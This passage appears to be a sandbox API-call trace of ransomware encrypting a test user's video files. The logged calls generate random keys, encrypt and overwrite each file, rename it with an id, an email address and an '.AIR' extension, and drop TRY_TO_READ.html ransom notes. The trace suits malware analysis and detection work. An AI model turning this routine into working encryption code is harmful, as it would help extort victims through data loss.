lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xc9b7 [0167.618] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.618] GetProcessHeap () returned 0x2e0000 [0167.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.618] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.618] WriteFile (in: hFile=0x568, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.619] WriteFile (in: hFile=0x568, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.619] WriteFile (in: hFile=0x568, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.619] ReadFile (in: hFile=0x568, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xc9b7, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xc9b7, lpOverlapped=0x0) returned 1 [0167.620] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.620] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.620] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf", dwFileAttributes=0x80) returned 1 [0167.621] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf") returned 71 [0167.621] GetProcessHeap () returned 0x2e0000 [0167.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x30a498 [0167.621] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf" [0167.621] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0167.621] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\nljuv0ryxj7qxv.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\nljuv0ryxj7qxv.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.623] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\nlJUV0ryXJ7QxV.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\nljuv0ryxj7qxv.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0167.623] GetProcessHeap () returned 0x2e0000 [0167.623] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.623] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4050) returned 1 [0167.623] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xfd2 [0167.623] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.623] GetProcessHeap () returned 0x2e0000 [0167.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.624] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.624] WriteFile (in: hFile=0x568, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.624] WriteFile (in: hFile=0x568, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.625] WriteFile (in: hFile=0x568, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.625] ReadFile (in: hFile=0x568, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xfd2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xfd2, lpOverlapped=0x0) returned 1 [0167.625] SetFilePointer (in: hFile=0x568, lDistanceToMove=-4050, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.625] WriteFile (in: hFile=0x568, lpBuffer=0x3b33f0*, nNumberOfBytesToWrite=0xfd2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b33f0*, lpNumberOfBytesWritten=0x2acf9c8*=0xfd2, lpOverlapped=0x0) returned 1 [0167.625] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaf3d050, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0xb17965d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb17965d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1ae8 [0167.625] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\daw6GeC\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\daw6gec\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0167.629] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\ildqvio\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0167.632] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.632] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.632] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv", dwFileAttributes=0x80) returned 1 [0167.633] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv") returned 69 [0167.633] GetProcessHeap () returned 0x2e0000 [0167.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf0) returned 0x30a498 [0167.633] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv" [0167.633] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.633] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\wllfu3jxrcd3rrrx.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\wllfu3jxrcd3rrrx.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.635] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\wLlfu3JXrcd3RRrX.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\wllfu3jxrcd3rrrx.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0167.635] GetProcessHeap () returned 0x2e0000 [0167.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.635] GetFileSizeEx (in: hFile=0x56c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=82438) returned 1 [0167.636] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14206 [0167.636] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.636] GetProcessHeap () returned 0x2e0000 [0167.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.636] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.636] WriteFile (in: hFile=0x56c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.637] WriteFile (in: hFile=0x56c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.637] WriteFile (in: hFile=0x56c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.637] ReadFile (in: hFile=0x56c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x14206, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x14206, lpOverlapped=0x0) returned 1 [0167.638] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.638] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.638] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi", dwFileAttributes=0x80) returned 1 [0167.639] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi") returned 58 [0167.639] GetProcessHeap () returned 0x2e0000 [0167.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3a7428 [0167.639] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi" [0167.639] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0167.639] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\sn61n.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\sn61n.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.641] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\Sn61n.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\sn61n.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0167.641] GetProcessHeap () returned 0x2e0000 [0167.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.641] GetFileSizeEx (in: hFile=0x56c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=11593) returned 1 [0167.641] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2d49 [0167.642] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.642] GetProcessHeap () returned 0x2e0000 [0167.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.642] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.642] WriteFile (in: hFile=0x56c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.643] WriteFile (in: hFile=0x56c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.643] WriteFile (in: hFile=0x56c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.643] ReadFile (in: hFile=0x56c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x2d49, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x2d49, lpOverlapped=0x0) returned 1 [0167.643] SetFilePointer (in: hFile=0x56c, lDistanceToMove=-11593, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.643] WriteFile (in: hFile=0x56c, lpBuffer=0x3b5168*, nNumberOfBytesToWrite=0x2d49, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b5168*, lpNumberOfBytesWritten=0x2acf9c8*=0x2d49, lpOverlapped=0x0) returned 1 [0167.644] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.644] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.644] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi", dwFileAttributes=0x80) returned 1 [0167.644] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi") returned 73 [0167.644] GetProcessHeap () returned 0x2e0000 [0167.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x336dd8 [0167.644] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi" [0167.644] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0167.644] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\-sqwfaack7mwc2cu4olg.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\-sqwfaack7mwc2cu4olg.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.649] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\-sqWfaACk7mwc2cu4Olg.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\-sqwfaack7mwc2cu4olg.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0167.649] GetProcessHeap () returned 0x2e0000 [0167.649] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.649] GetFileSizeEx (in: hFile=0x56c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=67346) returned 1 [0167.649] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10712 [0167.650] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.650] GetProcessHeap () returned 0x2e0000 [0167.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.650] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.650] WriteFile (in: hFile=0x56c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.651] WriteFile (in: hFile=0x56c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.651] WriteFile (in: hFile=0x56c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.651] ReadFile (in: hFile=0x56c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x10712, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x10712, lpOverlapped=0x0) returned 1 [0167.651] SetFilePointer (in: hFile=0x56c, lDistanceToMove=-67346, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.651] WriteFile (in: hFile=0x56c, lpBuffer=0x3c2b30*, nNumberOfBytesToWrite=0x10712, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c2b30*, lpNumberOfBytesWritten=0x2acf9c8*=0x10712, lpOverlapped=0x0) returned 1 [0167.652] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb49b4800, ftCreationTime.dwHighDateTime=0x1d4ccfb, ftLastAccessTime.dwLowDateTime=0xb17965d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb17965d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1b28 [0167.652] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.652] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.652] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv", dwFileAttributes=0x80) returned 1 [0167.652] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv") returned 80 [0167.652] GetProcessHeap () returned 0x2e0000 [0167.652] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x30a498 [0167.652] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv") 